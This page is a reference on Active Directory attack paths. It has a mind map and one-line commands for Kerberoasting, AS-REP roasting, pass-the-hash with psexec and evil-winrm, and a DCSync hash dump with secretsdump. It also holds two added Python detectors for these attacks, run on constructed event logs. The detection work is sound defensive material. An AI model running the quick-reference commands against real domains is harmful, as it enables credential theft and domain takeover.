AD Attack Paths

Common Active Directory attack techniques

Active Directory Attacks


Mind Map

The map below is the Mermaid source of the page's attack-path diagram, one edge per line:

    graph TD
        A[Initial Foothold] --> B{Attack Vector}
        B --> C[Kerberoasting]
        B --> D[AS-REP Roasting]
        B --> E[Password Spraying]
        C --> F[Crack TGS Offline]
        D --> G[Crack AS-REP Offline]
        E --> H[Valid Credentials]
        F --> I[Service Account Access]
        G --> I
        H --> I
        I --> J[Lateral Movement]
        J --> K[Domain Admin]
        K --> L[DCSync]

Quick Reference

Kerberoasting

GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.5 -request # Request TGS for Kerberoasting
hashcat -m 13100 krb5tgs.txt wordlist.txt # Crack TGS hashes

AS-REP Roasting

GetNPUsers.py domain/ -usersfile users.txt -dc-ip 10.10.10.5 # Check for AS-REP Roasting (no pre-auth)
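Both roasting techniques above leave a distinctive trace on the domain controller: Kerberoasting shows up as one principal requesting RC4 (0x17) service tickets for many different SPNs in a short interval (event 4769), and AS-REP roasting shows up as a TGT issued to an account with pre-authentication disabled (event 4768 with PreAuthType 0). The following detection logic is an added example, not code from the original page; the event records are constructed to mimic the extracted fields of those two event IDs and were not captured from a real domain. Thresholds, the five-minute window and the account names are assumptions for the example.

```python
"""Detect Kerberoasting and AS-REP roasting patterns in Kerberos audit events.

Added example (not from the original page). The records below are constructed
to look like Windows Security events 4769 (TGS request) and 4768 (TGT request)
after field extraction; they were not captured from a real domain controller.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"      # TicketEncryptionType that offline cracking tools prefer
AES256 = "0x12"        # modern default; not useful for roasting
PREAUTH_NONE = "0"     # 4768 PreAuthType 0: account does not require pre-authentication


def _tgs(ts, user, service, enc, ip):
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": enc, "IpAddress": ip}


def _tgt(ts, user, enc, preauth, ip):
    return {"EventID": 4768, "TimeCreated": ts, "TargetUserName": user,
            "TicketEncryptionType": enc, "PreAuthType": preauth, "IpAddress": ip}


# Constructed sample log (not real telemetry).
SAMPLE_EVENTS = [
    # one workstation user pulling RC4 tickets for five different SPNs in ten seconds
    _tgs("2024-05-01T10:00:01", "j.doe@CORP.LOCAL", "svc_sql",    RC4_HMAC, "10.0.0.25"),
    _tgs("2024-05-01T10:00:03", "j.doe@CORP.LOCAL", "svc_web",    RC4_HMAC, "10.0.0.25"),
    _tgs("2024-05-01T10:00:05", "j.doe@CORP.LOCAL", "svc_backup", RC4_HMAC, "10.0.0.25"),
    _tgs("2024-05-01T10:00:07", "j.doe@CORP.LOCAL", "svc_mssql2", RC4_HMAC, "10.0.0.25"),
    _tgs("2024-05-01T10:00:09", "j.doe@CORP.LOCAL", "svc_exch",   RC4_HMAC, "10.0.0.25"),
    _tgs("2024-05-01T10:00:11", "j.doe@CORP.LOCAL", "WS01$",      RC4_HMAC, "10.0.0.25"),  # machine account, ignored
    # normal activity: a single legacy RC4 request and an AES request
    _tgs("2024-05-01T09:00:00", "b.jones@CORP.LOCAL", "svc_sql", RC4_HMAC, "10.0.0.40"),
    _tgs("2024-05-01T10:05:00", "a.smith@CORP.LOCAL", "svc_sql", AES256,   "10.0.0.31"),
    # TGT requests: one account has pre-authentication disabled
    _tgt("2024-05-01T09:30:00", "a.smith@CORP.LOCAL",    AES256,   "2",          "10.0.0.31"),
    _tgt("2024-05-01T10:02:00", "svc_legacy@CORP.LOCAL", RC4_HMAC, PREAUTH_NONE, "10.0.0.25"),
]


def _ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def detect_kerberoasting(events, min_spns=4, window=timedelta(minutes=5)):
    """Return one alert per requester that obtained RC4 service tickets for
    at least `min_spns` distinct SPNs within any `window`-long interval."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or ev["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        # machine accounts and krbtgt have long random keys; skip them to cut noise
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_user[ev["TargetUserName"]].append((_ts(ev), svc))

    alerts = []
    for user, reqs in by_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):              # sliding window over sorted requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) >= min_spns:
                alerts.append({"user": user, "spns": sorted(distinct),
                               "first_seen": reqs[start][0].isoformat()})
                break                             # one alert per user is enough
    return alerts


def detect_asrep_roasting(events):
    """Return accounts that received a TGT without pre-authentication (PreAuthType 0)."""
    return sorted({ev["TargetUserName"] for ev in events
                   if ev["EventID"] == 4768 and ev.get("PreAuthType") == PREAUTH_NONE})


if __name__ == "__main__":
    for a in detect_kerberoasting(SAMPLE_EVENTS):
        print(f"possible Kerberoasting by {a['user']} from {a['first_seen']}: {a['spns']}")
    for acct in detect_asrep_roasting(SAMPLE_EVENTS):
        print(f"AS-REP roastable account (no pre-auth): {acct}")
```

The AS-REP check is really an inventory check as much as a detection: every account it reports has "Do not require Kerberos preauthentication" set and is roastable by anyone who can reach the KDC, so the fix is to clear that flag. The Kerberoasting rule keys on the RC4 encryption type because service accounts that only have AES keys (or that use a gMSA) produce tickets that are not practical to crack; moving service accounts to AES-only and long random passwords shrinks both the alert volume and the real exposure.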

Pass-the-Hash

impacket-psexec -hashes :NTHASH user@10.10.10.5 # Pass-the-Hash with PsExec
evil-winrm -i 10.10.10.5 -u user -H NTHASH # Pass-the-Hash with Evil-WinRM

DCSync

secretsdump.py domain/user:pass@10.10.10.5 # DCSync to dump domain hashes (needs rights)
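DCSync works by asking a domain controller to replicate directory data, so the rights it needs (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) are exactly what to audit: with object access auditing on the domain head, each replication request from a principal is logged as event 4662 with those extended-right GUIDs in its Properties field, and anything that is not a domain controller or a known sync account is worth an alert. The code below is an added example, not part of the original page; the two GUIDs are the real values of those extended rights, while the event records, DC names and the allowlist are constructed for the example.

```python
"""Flag directory-replication access (the permission DCSync relies on) by
principals that are not domain controllers.

Added example, not from the original page. The two extended-right GUIDs are
the real values of DS-Replication-Get-Changes and DS-Replication-Get-Changes-All;
the events, host names and allowlist below are constructed for this example.
"""
import re

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")

# Hypothetical allowlist: non-DC accounts that legitimately replicate (for
# instance a directory-sync service account). Review it; do not grow it on demand.
KNOWN_REPLICATORS = {"svc_dirsync"}

# Properties value as seen in 4662: an access-mask token followed by the GUIDs
# of the rights exercised. Constructed, but shaped like the real field.
BOTH_RIGHTS = ("%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
               "\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
UNRELATED_RIGHT = "%%7688\n{ffffffff-0000-0000-0000-000000000000}"   # placeholder GUID


def _op(subject, props, obj="DC=corp,DC=local"):
    """Build a constructed 4662 record ("An operation was performed on an object")."""
    return {"EventID": 4662, "SubjectUserName": subject, "SubjectDomainName": "CORP",
            "ObjectName": obj, "AccessMask": "0x100", "Properties": props}


# Constructed sample events (not real telemetry).
SAMPLE_4662 = [
    _op("DC02$", BOTH_RIGHTS),                 # normal inter-DC replication
    _op("j.doe", BOTH_RIGHTS),                 # a user account pulling replication data
    _op("j.doe", UNRELATED_RIGHT),             # some other control-access right
    _op("svc_dirsync", BOTH_RIGHTS),           # allowlisted sync account
    {"EventID": 4624, "SubjectUserName": "j.doe", "SubjectDomainName": "CORP"},  # unrelated logon
]


def requested_replication_rights(ev):
    """Return the replication rights named in a 4662 Properties field (empty if none)."""
    if ev.get("EventID") != 4662:
        return set()
    return REPLICATION_RIGHTS & set(GUID_RE.findall(ev["Properties"].lower()))


def detect_dcsync(events, dc_names, allowlist=frozenset(KNOWN_REPLICATORS)):
    """One alert per 4662 event in which a principal that is neither a domain
    controller (machine account of a name in `dc_names`) nor allowlisted
    exercised a directory replication right."""
    dc_accounts = {f"{name.upper()}$" for name in dc_names}
    alerts = []
    for ev in events:
        rights = requested_replication_rights(ev)
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in dc_accounts or subject in allowlist:
            continue
        alerts.append({"subject": f"{ev['SubjectDomainName']}\\{subject}",
                       "object": ev["ObjectName"],
                       "rights": sorted(rights),
                       # Get-Changes-All is what exposes secrets such as password hashes
                       "full_replication": DS_REPL_GET_CHANGES_ALL in rights})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_4662, {"dc01", "dc02"}):
        print(f"replication request by {a['subject']} on {a['object']} "
              f"(secrets exposed: {a['full_replication']})")
```

The same rights are also the thing to audit at rest: any principal holding DS-Replication-Get-Changes-All on the domain object can run the dump above without ever tripping the logon-based controls, so the ACL of the domain head deserves a periodic review alongside this event-based rule.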